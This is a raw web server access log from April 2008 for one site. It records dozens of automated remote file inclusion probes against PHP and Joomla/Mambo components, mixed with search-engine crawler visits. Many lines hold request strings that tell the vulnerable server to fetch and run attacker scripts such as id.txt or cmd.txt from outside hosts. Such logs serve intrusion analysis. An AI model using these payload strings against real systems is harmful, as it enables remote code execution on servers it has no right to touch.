62.87.154.40 - - [23/Apr/2008:09:00:04 -0700] "GET /logs/access_080215.log/xGB.php?act=admin&do=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:09:00:04 -0700] "GET /xGB.php?act=admin&do=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:09:00:05 -0700] "GET /logs/xGB.php?act=admin&do=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.87.154.40 - - [23/Apr/2008:09:00:22 -0700] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.20.5.26 - - [23/Apr/2008:09:00:25 -0700] "GET /logs/access_080218.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.66.227.40 - - [23/Apr/2008:09:00:31 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://begundal.info/nothing/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.66.227.40 - - [23/Apr/2008:09:00:31 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://begundal.info/nothing/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
198.66.227.40 - - [23/Apr/2008:09:00:31 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://begundal.info/nothing/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:00:40 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:00:41 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:00:41 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
66.11.238.47 - - [23/Apr/2008:09:01:38 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.11.238.47 - - [23/Apr/2008:09:01:38 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.11.238.47 - - [23/Apr/2008:09:01:38 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.11.238.64 - - [23/Apr/2008:09:01:42 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.11.238.64 - - [23/Apr/2008:09:01:42 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.11.238.64 - - [23/Apr/2008:09:01:42 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:01:47 -0700] "GET /logs/access_080315.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:09:01:51 -0700] "GET /logs/access.log/index2.php?x=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:09:01:51 -0700] "GET /index2.php?x=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:09:01:51 -0700] "GET /logs/index2.php?x=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:09:02:14 -0700] "GET /logs/access.log/index2.php?x=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:09:02:14 -0700] "GET /index2.php?x=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.118.97.160 - - [23/Apr/2008:09:02:14 -0700] "GET /logs/index2.php?x=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:02:28 -0700] "GET /logs/access_080220.log/homepage.php?sel=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:02:28 -0700] "GET /logs/homepage.php?sel=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:09:02:28 -0700] "GET /logs/access.log/homepage.php?sel=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:02:32 -0700] "GET /logs/access_080315.log/templates/mangobery/footer.sample.php?Site_Path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:02:32 -0700] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:02:33 -0700] "GET /logs/templates/mangobery/footer.sample.php?Site_Path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:02:47 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:02:47 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:02:48 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:02:52 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:02:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:02:53 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:03:00 -0700] "GET /logs/access_080114.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:03:08 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:03:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:03:08 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:03:15 -0700] "GET /logs/access_080108.log/templates/mangobery/footer.sample.php?Site_Path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
211.114.53.153 - - [23/Apr/2008:09:03:47 -0700] "GET /logs/access_080218.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.151.96.6 - - [23/Apr/2008:09:03:48 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:09:03:51 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:04:05 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:04:12 -0700] "GET /logs/access_080315.log/templates/mangobery/footer.sample.php?Site_Path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:04:12 -0700] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:04:13 -0700] "GET /logs/templates/mangobery/footer.sample.php?Site_Path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
217.151.96.6 - - [23/Apr/2008:09:04:24 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:04:43 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:04:43 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:04:44 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:04:50 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:05:36 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.11.67.242 - - [23/Apr/2008:09:05:38 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
200.11.67.242 - - [23/Apr/2008:09:05:39 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:06:09 -0700] "GET /logs/access_080114.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
220.80.107.90 - - [23/Apr/2008:09:06:19 -0700] "GET /logs/access_080218.log//index.php?pagina=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:07:43 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:07:43 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:07:44 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.23 - - [23/Apr/2008:09:08:00 -0700] "GET /minamijewelry/html/dream.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.213.30 - - [23/Apr/2008:09:08:06 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 1095122 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:08:30 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [23/Apr/2008:09:08:33 -0700] "GET /logs/access_080204.log/templates/mangobery/footer.sample.php?Site_Path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
65.126.237.102 - - [23/Apr/2008:09:09:25 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.126.237.102 - - [23/Apr/2008:09:09:28 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.240.231.154 - - [23/Apr/2008:09:09:31 -0700] "GET /logs/access_080218.log//index.php?pagina=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:10:10 -0700] "GET /logs/access_080329.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
72.54.129.234 - - [23/Apr/2008:09:10:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:10:13 -0700] "GET /logs/access_080228.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:10:13 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:10:13 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.3.194.35 - - [23/Apr/2008:09:10:39 -0700] "GET /pages.php?page=http://www.troop66nm.org/image/response1?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.3.194.35 - - [23/Apr/2008:09:10:40 -0700] "GET /logs/pages.php?page=http://www.troop66nm.org/image/response1?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
209.168.161.227 - - [23/Apr/2008:09:11:05 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.168.161.227 - - [23/Apr/2008:09:11:16 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.227 - - [23/Apr/2008:09:11:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.227 - - [23/Apr/2008:09:11:21 -0700] "GET /bikes/cb750K6/?S=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:11:43 -0700] "GET /logs/access_080117.log/admin/index.php?o=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:11:43 -0700] "GET /admin/index.php?o=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.31.61.43 - - [23/Apr/2008:09:11:43 -0700] "GET /?.php?mosConfig_absolute_path=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:11:43 -0700] "GET /logs/admin/index.php?o=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:11:53 -0700] "GET /logs/access_080117.log/admin/index.php?o=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:11:53 -0700] "GET /admin/index.php?o=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:11:53 -0700] "GET /logs/admin/index.php?o=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:12:04 -0700] "GET /logs/access_080223.log/index.php?body=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:12:07 -0700] "GET /index.php?body=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:12:07 -0700] "GET /logs/index.php?body=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:16 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:16 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:19 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:20 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:20 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:20 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:23 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:33 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:34 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.120.198 - - [23/Apr/2008:09:12:39 -0700] "GET /logs/access_080218.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:44 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:45 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:09:12:45 -0700] "GET //?mosConfig_absolute_path=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
216.17.107.171 - - [23/Apr/2008:09:12:50 -0700] "GET /logs/access_080207.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:09:12:51 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.107.171 - - [23/Apr/2008:09:12:52 -0700] "GET /logs/access_071122.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:09:12:58 -0700] "GET /logs//?mosConfig_absolute_path=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 200 44415 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
222.237.76.146 - - [23/Apr/2008:09:13:00 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.237.76.146 - - [23/Apr/2008:09:13:00 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:09:13:09 -0700] "GET /logs/access_080324.log/index.php?body=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [23/Apr/2008:09:14:11 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.137.139.73 - - [23/Apr/2008:09:14:19 -0700] "GET /logs/index.php?option=com_newsfeeds&task=&Itemid=&mosConfig_absolute_path=http://www.nyekencoi.250x.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.137.139.73 - - [23/Apr/2008:09:14:21 -0700] "GET /index.php?option=com_newsfeeds&task=&Itemid=&mosConfig_absolute_path=http://www.nyekencoi.250x.com/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
